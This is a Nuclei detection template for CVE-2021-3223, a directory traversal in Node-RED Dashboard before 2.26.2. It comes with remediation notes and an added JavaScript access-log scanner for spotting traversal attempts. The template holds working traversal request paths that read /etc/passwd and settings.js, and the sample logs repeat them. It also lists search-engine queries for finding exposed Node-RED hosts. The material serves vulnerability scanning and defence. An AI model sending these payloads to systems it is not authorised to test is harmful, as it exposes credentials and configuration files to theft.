Node RED Dashboard <2.26.2 - Local File Inclusion
ID: CVE-2021-3223
Severity: high
Author: gy741,pikpikcu
Tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js
Description
NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
YAML Source
id: CVE-2021-3223

info:
  name: Node RED Dashboard <2.26.2 - Local File Inclusion
  author: gy741,pikpikcu
  severity: high
  description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.
  reference:
    - https://github.com/node-red/node-red-dashboard/issues/669
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
    - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3223
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3223
    cwe-id: CWE-22
    epss-score: 0.09614
    epss-percentile: 0.94637
    cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nodered
    product: node-red-dashboard
    framework: node.js
    shodan-query:
      - title:"Node-RED"
      - http.title:"node-red"
    fofa-query:
      - title="Node-RED"
      - title="node-red"
    google-query: intitle:"node-red"
  tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js

http:
  - method: GET
    path:
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Node-RED web server is listening"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a0047304502205e6244f37e5e09dc8903204edfc3e6f4f082526ab91b53158e38d89cb762a540022100f0a0d9b50f62c0aa5e2bf326c16f7d644d56caf843bd9ebc7f841196c7ae9067:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3223.yaml"
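
For the defender's side of the traversal described above, the following added example (not part of the original template or of Node-RED Dashboard) scans access-log lines for requests under /ui_base/js/ that resolve outside that route after percent-decoding. It assumes a combined-format access log from a reverse proxy; the function names and the sample log lines are constructed for illustration.

```javascript
// Added example: flag logged requests that escape /ui_base/js/ once decoded.
const ROUTE = ['ui_base', 'js'];

// Percent-decode repeatedly (bounded) so double-encoded separators (%252f) are caught too.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { return cur; } // malformed escape: stop decoding
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// True when the target hits the dashboard JS route but its resolved path leaves it.
function escapesUiBase(requestTarget) {
  const rawPath = requestTarget.split('?')[0];
  const idx = rawPath.toLowerCase().indexOf('/ui_base/js/');
  if (idx === -1) return false;
  const decoded = fullyDecode(rawPath.slice(idx)).replace(/\\/g, '/');
  const segs = [];
  for (const seg of decoded.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') segs.pop(); else segs.push(seg.toLowerCase());
  }
  return !(segs[0] === ROUTE[0] && segs[1] === ROUTE[1]);
}

// Return one record per suspicious log line: client address, raw target, HTTP status.
function scanLog(text) {
  const hits = [];
  for (const line of text.split('\n')) {
    const m = line.match(/^(\S+) .*?"[A-Z]+ (\S+) HTTP\/[\d.]+" (\d{3})/);
    if (m && escapesUiBase(m[2])) hits.push({ client: m[1], target: m[2], status: Number(m[3]) });
  }
  return hits;
}

// Constructed sample log (documentation IP ranges), not taken from a real system.
const SAMPLE_LOG = [
  '192.0.2.10 - - [01/Feb/2021:10:00:00 +0000] "GET /ui_base/js/app.min.js HTTP/1.1" 200 51234',
  '198.51.100.7 - - [01/Feb/2021:10:00:05 +0000] "GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1" 200 9120',
  '198.51.100.7 - - [01/Feb/2021:10:00:06 +0000] "GET /ui_base/js/..%252f..%252fetc%252fpasswd HTTP/1.1" 404 139',
  '192.0.2.10 - - [01/Feb/2021:10:00:09 +0000] "GET /ui/ HTTP/1.1" 200 1800',
].join('\n');

console.log(scanLog(SAMPLE_LOG));
```

A hit logged with status 200 means the request was served rather than rejected, so review those first and confirm the installed dashboard version is 2.26.2 or later.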